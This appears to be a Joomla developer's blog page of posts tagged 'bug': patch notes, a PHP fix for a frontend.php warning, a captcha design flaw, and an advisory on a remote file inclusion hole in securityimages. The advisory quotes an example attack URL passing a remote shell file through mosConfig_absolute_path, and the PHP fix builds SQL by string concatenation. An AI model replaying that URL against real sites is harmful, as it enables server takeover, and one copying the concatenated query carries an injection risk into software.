bug

Bug may refer to: read more at WikiPedia

  • To solve any problems with securityimages and the admin sessions (bug in Joomla 1.0.13), it avoid you being kicked out of admin every other link.
    You'll have to upload these files with FTP/SCp and overwrite existing Joomla! 1.0.13 files!
    BUG: Patches for Joomla 1.0.13 that includes the admin session fixes? Thanks to users in my forum


    Download JoomlaPatches for Joomla 1.0.13 for securityimages 4.x only

  •   In order to solve  to following issues in Joomla 1.0.9

    Warning: Invalid argument supplied for foreach() in /var/www/vhosts/waltercedric.com/httpdocs/includes/frontend.php on line 85

    Edit the file includes/frontend.php , this is the correct code: 

    /**
    * Cache some modules information
    * @return array
    */
    function &initModules() {
    global $database, $my, $Itemid;

    if (!isset( $GLOBALS['_MOS_MODULES'] )) {
    $query = "SELECT id, title, module, position, content, showtitle, params"
    . "\n FROM __modules AS m"
    . "\n INNER JOIN __modules_menu AS mm ON mm.moduleid = m.id"
    . "\n WHERE m.published = 1"
    . "\n AND m.access <= '". $my->gid ."'"
    . "\n AND m.client_id != 1"
    . "\n AND ( mm.menuid = '".$Itemid."' OR mm.menuid = 0 )"
    . "\n ORDER BY ordering";

    $database->setQuery( $query );
    $modules = $database->loadObjectList();
    foreach ($modules as $module) {
    $GLOBALS['_MOS_MODULES'][$module->position][] = $module;
    }
    }
    return $GLOBALS['_MOS_MODULES'];
    }
    In yellow what has changed in that  method (extract)
    . "\n AND m.access <= '".$my->gid ."'"
    and
    . "\n AND ( mm.menuid = '".$Itemid."'OR mm.menuid = 0 )"



    All credits goes to user Mathinka(JoomlaPortal.de)


  • The webmaster of janwiersma.com sent me an email today
    at 6:12AM , his server was hacked because of a bug in
    securityimages. This bug allows a remote atackerto
    execute commands via remote forceful include and
    execute function on your server
    and affect ALL version of securityimages <= 3.0.5

    Here are all files which put your server at risk:
    client.php,configinsert.php,lang.php,server.php

    Example of attack:
    http://web/components/com_securityimages/
    configinsert.php?mosConfig_absolute_path=http://shell.txt
    from http://securityreason.com/exploitalert/892
    Secunia has also a report on it: http://secunia.com/product/11186/
    In fact I forget to use that line in these files:
    defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
    This avoid any requests to access directly this file. 

    - upgrade to 3.0.6 (download at Joomla Forge or in my download sections) OR
    - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');at the beginning of each file)

    Please also contact all Your friends which are using securityimages!

    And for my other components?

    Hashcash 1.2.X is also affected: http://secunia.com/product/11046/  and my patch is avalaible!

    - upgrade to 1.2.2  (download at Joomla Forge or in my download sections) OR
    - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');at the beginning of each file)

    JoomlaCloud is NOT affected





    YOU ARE ALL URGE TO UPGRADE ASAP!

  • I've getting now many emails and bugs reports about security images 3.0.4. After looking closely at the source code and trying to reproduce those problems, I finally found the bug.
    In fact this component is now a victim of its success, using it everywhere has also revealed a serious design flaw, but let me explain....
    Security Images is using 2 hidden fields in the background:
    • Security_try which contains the text entered by the user
    • Security_refid, which contains a UUID which will be use or not (depending on the Plugin) to locate the private key in the database or session.
    And these hidden fields names are spread in the code... this let the horror scenario happen:
    If you have many securityimages (captcha images) generated in the same page: login module may have one, Guestbook may have one for example, the code wont work!

    The browser will submit all Hidden fields which are in the form, and thus the first input text box (Security_try) may overwrite what the user has entered in another one...rejecting always the user as a result.

    Solutions
    1. Prio 1: framework has to be configurable from the outside,
    2. Prio 1:  Free porn attack counter measures will be add to HNCapctha Plugin
    Release

    3.0.5 (Patch)
    • Free porn attack counter measures will be add to HNCapctha Plugin.
    4.0.0 will have non compatible API changes
    You will have to change some 3rd party components, but I will support following 3rd party components:
    • com_contact(Joomla core)
    • com_login (Joomla core)
    • com_registration (Joomla core)
    • akobookPlus
    • akoCommenPlus
    Other like Community Builder, Galleries, JoomlaBoard will have to be supported by their own authors. Please contact them about that issue, I will document how to use the 4.0 in my wiki.

    Other new functionnalities will be add to the 4.0 releases soon. (You can submit your ideas here)

    Since it is raining over there :-( , it is realistic to see the version 4.0.0 before monday 29.05.2006

    AkobookPlusnew languages files:



  • You will for sure make a loooooooong trip with Microsoft, but do we really have to? see the bug found at mappoint.msn.com

    The register is now relaying the news Here

    1. Click here:  http://mappoint.msn.com/DirectionsFind.aspx
    2. Then change the "Address In" box to Norway
    3. In the first "City" box enter: haugesund
    4. Change the End "Address In" box to Norway
    5. In the "City" box enter: trondheim
    6. Click "Get Directions"